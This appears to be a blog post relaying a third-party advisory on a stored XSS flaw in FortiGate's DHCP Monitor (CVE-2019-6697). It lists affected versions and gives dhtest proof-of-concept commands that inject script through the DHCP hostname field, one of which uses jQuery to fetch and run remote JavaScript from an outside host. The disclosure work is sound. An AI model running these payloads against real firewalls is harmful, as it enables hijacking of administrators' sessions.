FortiOS XSS in DHCP-Monitor

Fortinet has released PSIRT FG-IR-19-184 (CVE-2019-6697) about a vulnerability in FortiOS of the FortiGate firewall. A DHCP packet may contain a stored XSS in the hostname parameter field.

Affected Versions and Update

Affected Products are FortiOS 6.2.1 and below & FortiOS 6.0.6 and below.
FortiOS 6.2.2 and FortiOS 6.0.7 fix the vulnerability


PoC/Vulnerability Details from ssd-disclosure.com

Source: https://ssd-disclosure.com/archives/3987/ssd-advisory-fortigate-dhcp-stored-xss

An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor.

This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection

  


 When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability:
  1. Install dhtest or any other tool that can send arbitrary DHCP packets.
    (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/)
  2. Send a malicious DHCP packet. For example:
    1
    2
    3
    4
    #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onload=alert();)>x"
        [Option]
        -m : mac address
        -h : hostname(dhcp option 12). The attacker can inject malicious scripts.

  • Once the victim logs into Fortigate’s dashboard and goes to the “DHCP Monitor”
    (https://<ip>/ng/dhcp/monitor) the browser will execute the malicious script injected by the attacker.

    • But there are a few limitations:

    The user’s input is validated, not allowing us to use tags like “<script src>”, “<img src=_onerror=>” and other similar options. There are also character count limits:
    • DHCP option 12 has a string size limit allowing only up to 256 characters. More information
      about this option is available in the RFC.
    • Fortigate’s string size can’t be longer than 128 characters.
    However, Fortigate uses jQuery which allows the attacker to bypass the mentioned restrictions and execute arbitrary scripts using the following method:
    #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onmouseover=$.getScript('//www.example.jp/a.js')>x"
     
    Source: https://ssd-disclosure.com/archives/3987/ssd-advisory-fortigate-dhcp-stored-xss 
    at
    Labels: , , ,

    No comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Splunk UseCase for attacks against FortiGate Firewall management interfaces

    If you are using Splunk as your SIEM you can try to detect attacks against your FortiGate firewalls by using the following SPL query: index...